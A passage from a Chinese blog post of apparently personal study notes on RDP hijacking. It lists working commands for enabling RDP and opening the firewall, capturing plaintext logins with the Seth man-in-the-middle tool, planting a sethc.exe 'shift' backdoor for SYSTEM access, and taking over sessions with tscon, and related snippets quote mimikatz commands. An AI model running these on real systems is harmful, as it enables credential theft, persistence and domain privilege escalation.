rdp劫持学习

最新推荐文章于 2024-05-23 09:53:51 发布
最新推荐文章于 2024-05-23 09:53:51 发布
阅读量768 收藏 2
点赞数
分类专栏: 内网蠕动 权限维持
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43645782/article/details/116741108
版权

rdp劫持学习

rdp服务确认启动

通过注册表查询

REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections # 查看RDP服务是否开启:1关闭,0开启
REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber  # 查看RDP服务的端口

在这里插入图片描述
hex的0xd3d等于10进制的3389

通过进程查看

tasklist /svc | find "TermService" # 找到对应服务进程的PID
netstat -ano | find "1820" # 找到进程对应的端口号

在这里插入图片描述

启动rdp

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x00000d3d /f  # 监听 3389 端口 
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow #允许3389通过防火墙

中间人攻击

git clone --depth=1 https://hub.fastgit.org/SySS-Research/Seth.git
cd seth

修改/etc/ssl/openssl.cnf

[system_default_sect]
#MinProtocol = TLSv1.2
#CipherString = DEFAULT@SECLEVEL=2
MinProtocol = None
CipherString = DEFAULT

./seth.sh eth0 192.168.164.128 192.168.164.131 192.168.164.129 # 在192.168.164.128机器上,劫持由192.168.164.131向192.168.164.129的RDP申请,获得登录明文

在本地测试时,链接win10主机可以,链接win2008r2报错

TLS alert internal error received, make sure to use RC4-SHA

有关问题

https://github.com/SySS-Research/Seth/issues/17

暂无解决方案

登录

在登录前,首先要查看是否有用户在线,
Windows Server 2003 支持统一用户登陆多地登陆互不影响,使用query user查看在线用户,XP没有该命令也可以使用taskmgr从任务管理器查看,同一权限下可以相互注销会话。
非服务器版本的Windows 系统默认只允许一个账户登录。当远程用户登录时使用与原系统相同的账户,原系统将切换到登陆页面,并会看到登陆的机器名
如果使用不同的账户,原系统将弹窗提示其他用户已登陆到此计算机
如果出现远程连接出现身份验证错误,要求的函数不支持

REG add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters /v AllowEncryptionOracle /t REG_DWORD /d 2 /f

shift后门结合rdp劫持

去掉”仅允许使用网络级别的身份验证的远程桌面的计算机连接”选项,利用shift后门可以快速获得system权限
shift后门

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"

query user   #查看用户ip
tscon id

利用点
切换域用户身份,域内提权。如:域管账号登录在当前机器,抓密码的方式均被拦截可以考虑该方式

多用户登录

手动设置

将计算机配置(Computer Configuration)->管理模板(Administrative Templates)->Windows组件(Windows Components)->远程桌面服务(Remote Desktop Services)->远程桌面会话主机(Remote Desktop Session Host)->链接(Connections),禁用”将远程桌面服务的用户限制到单独的远程桌面会话”(Restrict Remote Desktop Services users to a single Remote Desktop Services session)

rdpwrap

https://github.com/stascorp/rdpwrap

参考文章

LM-RDP
https://www.freebuf.com/sectool/170024.html

whojoe
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
〖教程〗RDP会话劫持 Ladon无密码登陆管理员桌面会话
K8哥哥
08-08 1239
前言 Windows系统下,tscon或任务管理器右键可被用来切换远程桌面的会话。正常情况下,切换会话时需要提供登录密码,但在SYSTEM权限下可够绕过验证,无密码实现未授权登录。该漏洞在2017年由以色列安全研究员Alexander Korznikov在个人博客中披露,mimikat里面也有该功能,为了方便Ladon也添加了该功能。 背景 实战中某个项目的内网HTTPS证书有问题,特别奇葩不知为何,代理或CMD下无法连WEBSHELL,还有些远程连接程序管理员连着远程机器,特别是连着数据库的在自动处理数
低版本RDP升级RDP高版本
04-14
远程桌面协议(RDP,Remote Desktop Protocol)是微软提供的一种远程访问技术,允许用户通过网络连接到另一台计算机,从而实现远程控制、操作和访问该计算机的桌面环境。在IT领域,随着技术的发展,RDP的版本也在...
SharpRDPHijack:POC远程桌面(RDP)会话劫持实用程序,用于断开连接的会话
03-08
夏普RDPH劫持 Sharp RDP Hijack是用于断开会话的概念验证.NET / C#远程桌面协议(RDP)会话劫持实用程序 背景 RDP会话劫持是一种开发后技术,用于控制(强制)断开的交互式登录会话。 在描述了该技术。 笔记 SharpRDPHijack.cs在.NET Framework v.4下的Visual Studio 2019中进行编译。 会话劫持需要提升的(管理员)上下文才能连接到另一个会话。 除非知道目标会话用户的密码,否则需要NT AUTHORITY \ SYSTEM上下文来控制会话。 没有提供的密码,SharpRDPHijack将(试图)模拟NT AUTHORITY \ SYSTEM。 Windows 2019 Server会话劫持与先前的OS版本相比表现出有趣的行为。 劫持了重定向到活动RDP会话的会话后,Windows登录屏幕会提示您输入用户的密码/凭据
关于RDP劫持小技巧
Adminxe的博客
04-15 861
一、劫持方式1: 创建用户: net user test 123.com /add net localgroup administrators test /add 登录后,使用mimikatz工具 privilege::debug #提权 ts::sessions #查看当前主机的会话 token::elevate #提升本地管理员权限为system ts::remote /id:1 #劫持id为1的会话 二、劫持方式2: mimikatz命令如下: privil
探索安全边界:SharpRDPHijack - RDP会话劫持工具
最新发布
gitblog_00077的博客
05-23 383
探索安全边界:SharpRDPHijack - RDP会话劫持工具 项目地址:https://gitcode.com/bohops/SharpRDPHijack 在这个数字化的时代,系统安全评估与渗透测试显得尤为重要。今天,我们向您推荐一个独特的开源项目——SharpRDPHijack,这是一个基于.NET/C#的远程桌面协议(RDP)会话劫持实用程序,专门用于处理已断开的交互式登录会话。 项目简...
RDP会话劫持
Armandhe的博客
07-22 1962
这个我也觉得很骚气啊,只是原理并不清楚
RDP Wrapper对应的配置文件
02-13
RDP Wrapper对应的配置文件,支持10.0.1904.1503
修改RDP协议端口脚本
04-16
修改RDP协议端口脚本
rdp0708.zip
06-04
rdp0708图形化检测工具,此工具可以准确的检测存在rdp0708漏洞的主机
RDP报表工具
09-06
此war包放到tomcat的webapps下,启动tomcat即可访问RDP服务!
RDP shift后门漏洞
qq_54713392的博客
04-20 517
RDP shift后门漏洞 在win7开机过程中,强制关闭计算机,再次开机会出现修复,点启动修复 当它无法修复时会弹出下面的框发送和不发送,这里有查看问题详细信息的按钮 点击该按钮可以看到有一些信息 在信息最下面有个隐私声明的地址 打开这个地址会看到是一个记事本文件,在记事本文件中有文件打开功能 这样我们就进入看到了主机的所有文件,可以进行一些列的工作 这里的D盘实际是主机的C盘 此时它会有一个本地的记事本,可以通过它打开TXT文件。打开Windows->System32文件夹 ,在文件
如何悄无声息的对RDP和远程会话进行劫持
weixin_33709590的博客
09-20 568
本文讲的是如何悄无声息的对RDP和远程会话进行劫持?,Alexander Korznikov演示在没有登录服务器的情况下使用Sticky Keys和tscon访问管理员RDP会话: RDP会话连接的简要背景 如果你之前使用过远程桌面连接或者远程终端服务,那么你一定知道只有拥有账户密码才能进行登录。那么,你知道不用密码也可以进行登录吗?继续往下看吧。 ...
RDP劫持:如何透明劫持RDS以及RemoteApp会话
diansuimo2268的博客
03-11 500
https://www.anquanke.com/post/id/101525 转载于:https://www.cnblogs.com/7bit/p/10510677.html
rdp
dadalan的专栏
08-25 2160
Remote Desktop Protocol (RDP) is Microsofts distributed presentation services protocol, which controls the transmission of display and user input between the client and the Terminal Server. RDP has b
远程桌面数据拦截
huike008的博客
06-26 320
远程桌面数据拦截 首先用嗅探器嗅探 以下是一份嗅探来的文件 记录了远程连接桌面的所有过程 =========================================== === Cain’s RDP sniffer generated file === =========================================== [RDP connection] ———...
RDP是什么意思?有什么用?
行云管家
04-11 5450
RDP是什么意思?有什么用?RDP有哪些版本?很多刚入行的童鞋都不是很清楚,今天我们大家一起来聊聊。 RDP是什么意思? RDP是 Remote Display Protocal(远程显示协议)的缩写;是微软公司基于多用户 Windows 系统开发的远程连接协议。主要用来连接装有终端服务的Windows 2000 Server 或 Windows Server 2003 服务器。 RDP有什么用? RDP远程协议是一个多通道协议,让用户通过本地电脑连接远程服务器。大部分的Windows、Linux服务器都有
Windows的RDP远程控制
qq_41439534的博客
05-14 1万+
RDP远程桌面介绍1)客户端运行“mstsc”命令行打开“远程桌面连接”程序2)输入对方的IP地址、用户名、密码默认仅允许2个用户同时登陆,同一个用户只能登陆一个桌面单击远程桌面连接窗口的“显示选项”,可以展开控制项保存用户名,密码配置显示大小,颜色允许使用本地音频、打印机、剪切板优化远程连接的体验身份验证方式。
RDP远程桌面连接解决方案
热门推荐
asdaddsd的博客
05-30 2万+
远程桌面协议(RDP)是一个多通道(multi-channel)的协议,让使用者(所在计算机称为用户端或本地计算机)连上提供微软终端机服务的计算机(称为服务端或远程计算机)。大部分的Windows版本都有用户端所需软件,有些其他操作系统也有这些用户端软件,例如Linux,FreeBSD,MacOSX,服务端计算机方面,则听取送到TCPport3389的数据。 Windows RDP远程桌面也有着一定的局限性。他一般不支持异地跨网连接。我们只能在局域网内使用,这对于今天的我们,尤其是处于疫情之中,难以进行线
RDP8.0协议详解:官方技术文档
"RDP协议官方文档,涵盖了RDP8.0版本的远程桌面协议,主要涉及基础连接和图形远程渲染技术。文档由微软在2013年7月22日发布,详细阐述了RDP协议的知识产权、技术细节以及实现指南。" RDP(Remote Desktop Protocol...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值